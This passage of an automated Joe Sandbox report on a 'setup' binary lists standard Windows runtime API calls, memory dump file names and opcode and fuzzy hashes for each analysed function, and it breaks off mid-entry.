              • Instruction Fuzzy Hash: BF312775D01228DBDB20EFA5D9497CDBBB8AF08300F1041AAE50CAB250EB709A85CF45
              APIs
                • Part of subcall function 00AFB970: GetLastError.KERNEL32(?,00000008,00B011BC), ref: 00AFB974
                • Part of subcall function 00AFB970: SetLastError.KERNEL32(00000000,00B16140,00000006,000000FF), ref: 00AFBA16
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B054F4
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B0553E
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B05604
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: InfoLocale$ErrorLast
              • String ID:
              • API String ID: 661929714-0
              • Opcode ID: cce43ca1a09f3b52abf3337865717192eb2c347ed676bdc54a4075e08cd1e4e9
              • Instruction ID: 3da873f42be1e311b820130853da0078ecf28bf3f2afbd134c1aeedbc7fbf29c
              • Opcode Fuzzy Hash: cce43ca1a09f3b52abf3337865717192eb2c347ed676bdc54a4075e08cd1e4e9
              • Instruction Fuzzy Hash: 2A615E71910A079BDB349F28CC82BAB7BE9EF14300F6081A9E905C69C5EB75D994DF60
              APIs
              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00B16140), ref: 00AEFF7B
              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00B16140), ref: 00AEFF85
              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00B16140), ref: 00AEFF92
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled$DebuggerPresent
              • String ID:
              • API String ID: 3906539128-0
              • Opcode ID: 84920ea437cce9400591388868137969da2344702542ff51dbefdf125b3b1c93
              • Instruction ID: 3764e60e01e9280463a0e565e0d2fd6ef8833c3718e53c3a5955cfe9a8162bd2
              • Opcode Fuzzy Hash: 84920ea437cce9400591388868137969da2344702542ff51dbefdf125b3b1c93
              • Instruction Fuzzy Hash: 6031C4759012289BCB21DF69D9897DDBBB8BF18310F5042EAE41CA7290EB709F85CF44
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aaabb51ee67577d41bf2c772d20abb3294cea10c41c3aea82b12306928e37f47
              • Instruction ID: 2341b38989d9401596f32dc5e427f04933339dd0d00059c30622a3a2e963ca6c
              • Opcode Fuzzy Hash: aaabb51ee67577d41bf2c772d20abb3294cea10c41c3aea82b12306928e37f47
              • Instruction Fuzzy Hash: B4F13E72E0121D9FDF14CFA9C8806ADFBB1FF88314F158269E915AB380D730AE458B90
              APIs
              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000000), ref: 00AFC226
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: ExceptionRaise
              • String ID:
              • API String ID: 3997070919-0
              • Opcode ID: aec203ae9b709296810bb7f844e078cdac367c695e84a8ee63332f2c3a3a4925
              • Instruction ID: de54db7e2b0114e84250fc407414462f25983ab9a26975fc432da9ead6352898
              • Opcode Fuzzy Hash: aec203ae9b709296810bb7f844e078cdac367c695e84a8ee63332f2c3a3a4925
              • Instruction Fuzzy Hash: 9EB15A3161060CCFD718CF69C586BA57BA0FF45364F258658F99ACF2A2C336E992CB44
              APIs
              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00AEBB52
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: FeaturePresentProcessor
              • String ID:
              • API String ID: 2325560087-0
              • Opcode ID: c249bd2c28bb903947f6a5371097bb9dd3093fc9eac4f6d9875445c46808f656
              • Instruction ID: f715e8e27a549143f2cc68fc64b24e6567a5e2bf8c1519cab5d920e019d01779
              • Opcode Fuzzy Hash: c249bd2c28bb903947f6a5371097bb9dd3093fc9eac4f6d9875445c46808f656
              • Instruction Fuzzy Hash: 9651A671D216458FEB24CF69DDC97AEB7F4FB48350F24892AC405E7290DBB89940CB60
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2e9599dae1074a2ab120e69a8ebcfac68d14fb32caa46d50d650c1f8453392be
              • Instruction ID: f904d2a593959dda271af3cac2d1c30b936bfc1738a280c11fb0b642f2e2ca7c
              • Opcode Fuzzy Hash: 2e9599dae1074a2ab120e69a8ebcfac68d14fb32caa46d50d650c1f8453392be
              • Instruction Fuzzy Hash: FA31D776900219AFCB20DFA8CC8DDBBBBBDEB84314F1441A8F915D7284EA309D448B50
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID:
              • String ID: 0
              • API String ID: 0-4108050209
              • Opcode ID: b9b86a57dbfd6389d154fc03c645cd7158f50b7388de7dc0fdaee318eadb3d61
              • Instruction ID: dce1a423d1964723dd76b4fab6e2d84aabafc3f3f368d75926acf70e1710334a
              • Opcode Fuzzy Hash: b9b86a57dbfd6389d154fc03c645cd7158f50b7388de7dc0fdaee318eadb3d61
              • Instruction Fuzzy Hash: ACC1BE70A0464E8FCB24CFA8C5906BAB7B1EF05310F28861DF696DB291C771ED46CB91
              APIs
                • Part of subcall function 00AFB970: GetLastError.KERNEL32(?,00000008,00B011BC), ref: 00AFB974
                • Part of subcall function 00AFB970: SetLastError.KERNEL32(00000000,00B16140,00000006,000000FF), ref: 00AFBA16
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00B05747
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: ErrorLast$InfoLocale
              • String ID:
              • API String ID: 3736152602-0
              • Opcode ID: 81adda158082810252f77c3f5344bd618c2e481170f86a3cb857fb9c5f814eb4
              • Instruction ID: 1f65271bd1b3a761e56f9199fd347862cc83331f12f1801a8ec5e00d39a92b23
              • Opcode Fuzzy Hash: 81adda158082810252f77c3f5344bd618c2e481170f86a3cb857fb9c5f814eb4
              • Instruction Fuzzy Hash: B721507261160AEBDB389B25DC82ABB7BE8EF54314B1040BAFD01D6981EB74ED449F50
              APIs
                • Part of subcall function 00AFB970: GetLastError.KERNEL32(?,00000008,00B011BC), ref: 00AFB974
                • Part of subcall function 00AFB970: SetLastError.KERNEL32(00000000,00B16140,00000006,000000FF), ref: 00AFBA16
              • EnumSystemLocalesW.KERNEL32(00B054A0,00000001,00000000,?,-00000050,?,00B05AD1,00000000,?,?,?,00000055,?), ref: 00B053EC
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: ErrorLast$EnumLocalesSystem
              • String ID:
              • API String ID: 2417226690-0
              • Opcode ID: fa1443f1171f491ad3286264b7c9e00e3f25073a9099951478a6262cebde8bf9
              • Instruction ID: 3b7f2518820c12b7127ee9129ed4907a76e8df3281b71123a763c019b72c6fb0
              • Opcode Fuzzy Hash: fa1443f1171f491ad3286264b7c9e00e3f25073a9099951478a6262cebde8bf9
              • Instruction Fuzzy Hash: 7C1129362007059FDB289F39C8915BBBBD1FF80359B54842DE68787B80D7717942CB40
              APIs
                • Part of subcall function 00AFB970: GetLastError.KERNEL32(?,00000008,00B011BC), ref: 00AFB974
                • Part of subcall function 00AFB970: SetLastError.KERNEL32(00000000,00B16140,00000006,000000FF), ref: 00AFBA16
              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00B056BC,00000000,00000000,?), ref: 00B0594E
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: ErrorLast$InfoLocale
              • String ID:
              • API String ID: 3736152602-0
              • Opcode ID: fa948158f69cf976009848aa63d43185d1c6ead700482713743724f2cb2eb2c2
              • Instruction ID: df733fd17dc9ee50106b6f8d64372fe3671b47151776691b51c9d4433f06c3f0
              • Opcode Fuzzy Hash: fa948158f69cf976009848aa63d43185d1c6ead700482713743724f2cb2eb2c2
              • Instruction Fuzzy Hash: 20F0D632600515FFDB345A61C845BFBBBA8DB40364F194465ED45A35C0EA70ED45C9D0
              APIs
                • Part of subcall function 00AFB970: GetLastError.KERNEL32(?,00000008,00B011BC), ref: 00AFB974
                • Part of subcall function 00AFB970: SetLastError.KERNEL32(00000000,00B16140,00000006,000000FF), ref: 00AFBA16
              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00B052DC
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: ErrorLast$InfoLocale
              • String ID: utf8
              • API String ID: 3736152602-905460609
              • Opcode ID: 7ff24de12868cc6545e1c25218eda5f251089837c47c232760c80c50d30c81e2
              • Instruction ID: c2e3e223fdf561037b9d99d798ebe60149f97df04837398b626f8fa25c1548f2
              • Opcode Fuzzy Hash: 7ff24de12868cc6545e1c25218eda5f251089837c47c232760c80c50d30c81e2
              • Instruction Fuzzy Hash: F1F0A432650209EBD724AB74DD86ABB77ECDB44350F1401B9F603D7281EB74AD0497A4
              APIs
                • Part of subcall function 00AFB970: GetLastError.KERNEL32(?,00000008,00B011BC), ref: 00AFB974
                • Part of subcall function 00AFB970: SetLastError.KERNEL32(00000000,00B16140,00000006,000000FF), ref: 00AFBA16
              • EnumSystemLocalesW.KERNEL32(00B056F3,00000001,?,?,-00000050,?,00B05A95,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00B0545F
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: ErrorLast$EnumLocalesSystem
              • String ID:
              • API String ID: 2417226690-0
              • Opcode ID: bb901e994cb9d57e9bb96a7beb487f663853ab2c790d75ddb1ed53cb5d614611
              • Instruction ID: 81c41717568684e03ea058842973f91de39815125b39d44d98769ee41793faee
              • Opcode Fuzzy Hash: bb901e994cb9d57e9bb96a7beb487f663853ab2c790d75ddb1ed53cb5d614611
              • Instruction Fuzzy Hash: 98F022322007086FCB245F789C81ABB7FD5EB80368B08846DFA428BA90D7B19C41CA50
              APIs
                • Part of subcall function 00AF7639: EnterCriticalSection.KERNEL32(?,?,00AF8C0E,00000000,00B167F0,0000000C,00AF8BD5,?,?,00AFC672,?,?,00AFBB0E,00000001,00000364,?), ref: 00AF7648
              • EnumSystemLocalesW.KERNEL32(00AFC8D3,00000001,00B169C0,0000000C,00AFCCA5,00000000), ref: 00AFC918
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: CriticalEnterEnumLocalesSectionSystem
              • String ID:
              • API String ID: 1272433827-0
              • Opcode ID: b565c5d9e6a1975710195396a9e7fd0a117a3527dad200cf9a817537e726902e
              • Instruction ID: 445a8571d024705897dc3853b997545eada4e366b78d0d39522dea7ad100af87
              • Opcode Fuzzy Hash: b565c5d9e6a1975710195396a9e7fd0a117a3527dad200cf9a817537e726902e
              • Instruction Fuzzy Hash: 31F03C32A40208EFD700EF98E942B9D7BF0EB54760F10411AF511DB2E0DBB94940CB80
              APIs
                • Part of subcall function 00AFB970: GetLastError.KERNEL32(?,00000008,00B011BC), ref: 00AFB974
                • Part of subcall function 00AFB970: SetLastError.KERNEL32(00000000,00B16140,00000006,000000FF), ref: 00AFBA16
              • EnumSystemLocalesW.KERNEL32(00B05288,00000001,?,?,?,00B05AF3,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00B05366
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: ErrorLast$EnumLocalesSystem
              • String ID:
              • API String ID: 2417226690-0
              • Opcode ID: 2d1b067dd3489e58ab1218d3cebf640a7399ff6b43eb98ff565df3c4f86aaf4a
              • Instruction ID: 6d5f2be373fc51e1306b9327de36781393972e3008c80a8cfb23c79b60462b34
              • Opcode Fuzzy Hash: 2d1b067dd3489e58ab1218d3cebf640a7399ff6b43eb98ff565df3c4f86aaf4a
              • Instruction Fuzzy Hash: 9DF05C3530020857CB149F75D84567B7FD4EFC1790B064099EB06CB590D7719C42CB90
              APIs
              • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00AFABFC,?,20001004,00000000,00000002,?,?,00AFA1FE), ref: 00AFCDDD
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: InfoLocale
              • String ID:
              • API String ID: 2299586839-0
              • Opcode ID: 6a2b99d5e1b84c6d12cf81d6176442b2c58ff6491683362b500d77e17ebfeba4
              • Instruction ID: 84b0ba194dec9e8fd0cca90f94917dc764f243b8f0968cb9c83c738a045d3e06
              • Opcode Fuzzy Hash: 6a2b99d5e1b84c6d12cf81d6176442b2c58ff6491683362b500d77e17ebfeba4
              • Instruction Fuzzy Hash: 6CE04F3254021CBBCF122FA2ED04ABE7E26FF84770F008120FE0566161CB718E20AAD4
              APIs
              • SetUnhandledExceptionFilter.KERNEL32(Function_0000C206,00AEB660), ref: 00AEC1FF
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled
              • String ID:
              • API String ID: 3192549508-0
              • Opcode ID: 3a88e3e0fa6b6b04549aa042b77a83e8b648902dd97302a4e7ca1bed32480e83
              • Instruction ID: 02f83a25acb60f08b505f71299130c1505cc52a199d968f0cbeae7633f6bf558
              • Opcode Fuzzy Hash: 3a88e3e0fa6b6b04549aa042b77a83e8b648902dd97302a4e7ca1bed32480e83
              • Instruction Fuzzy Hash:
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: HeapProcess
              • String ID:
              • API String ID: 54951025-0
              • Opcode ID: 3635c67d5a46eee3588ad599ee7a59c5e4e0568df17bc0ebbf1dd6c569c8a285
              • Instruction ID: 882f7507847b73c63b44a1d07cc3c3df103ef933cd6a0cab5bf78fd92a46713e
              • Opcode Fuzzy Hash: 3635c67d5a46eee3588ad599ee7a59c5e4e0568df17bc0ebbf1dd6c569c8a285
              • Instruction Fuzzy Hash: 3AA01130202200CBA3008F30AA882083AE8AA80A80308A228E008C32A0EF288088EB00
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 34d643ef7ecf25800d2914a68d55fee80bda48706cdd4e4555dc1250a157156e
              • Instruction ID: 2f54fc28f46ddbc7d19c0d9744bb134164f07f553d2b56c6e042e1cfac2b329e
              • Opcode Fuzzy Hash: 34d643ef7ecf25800d2914a68d55fee80bda48706cdd4e4555dc1250a157156e
              • Instruction Fuzzy Hash: 6ED1CB72A087809FC715DF29D945A2FFBE5BFC8744F044A1DF989AB211E730E9448B92
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
              • String ID:
              • API String ID: 3471368781-0
              • Opcode ID: 4c405bbedf3e07493c5cfc3400cf44e060b644b4a938acf3b0c92d8b8fc83c26
              • Instruction ID: fd73f2155b716b06739ef1ea270f3bb68b7a3430d537889487947a47364e1594
              • Opcode Fuzzy Hash: 4c405bbedf3e07493c5cfc3400cf44e060b644b4a938acf3b0c92d8b8fc83c26
              • Instruction Fuzzy Hash: A0B1E6B55007059BDB389B24CC92ABBBBE9EB54308F1445ADEB83C66C0EB75AD85C710
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 527fb0732a8729ff8d0d5c4a3f4b10570f7399d41cf223ced695ba9be1c4e189
              • Instruction ID: 5e80b67e475829d05fb0d482189f69050bf56415516c57faa4a93b3c20bedcb6
              • Opcode Fuzzy Hash: 527fb0732a8729ff8d0d5c4a3f4b10570f7399d41cf223ced695ba9be1c4e189
              • Instruction Fuzzy Hash: EE516071E00219EFDF14CF99C991ABEBBB6EF88300F19809DE915AB241D7349E51CB90
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181989757.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2182032607.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_ae0000_setup.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
              • Instruction ID: 730aacad07599027ab07f79eb80b64740f90d72faca75e1b738ea3961f07a368
              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
              • Instruction Fuzzy Hash: CC112BB72401C283D6488B3FDAB86F7A795EBC5730F2C437BD0424B758D222D947A600
              Memory Dump Source
              • Source File: 00000000.00000002.2181895562.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
              • Associated: 00000000.00000002.2181853434.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2181962417.0000000000B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
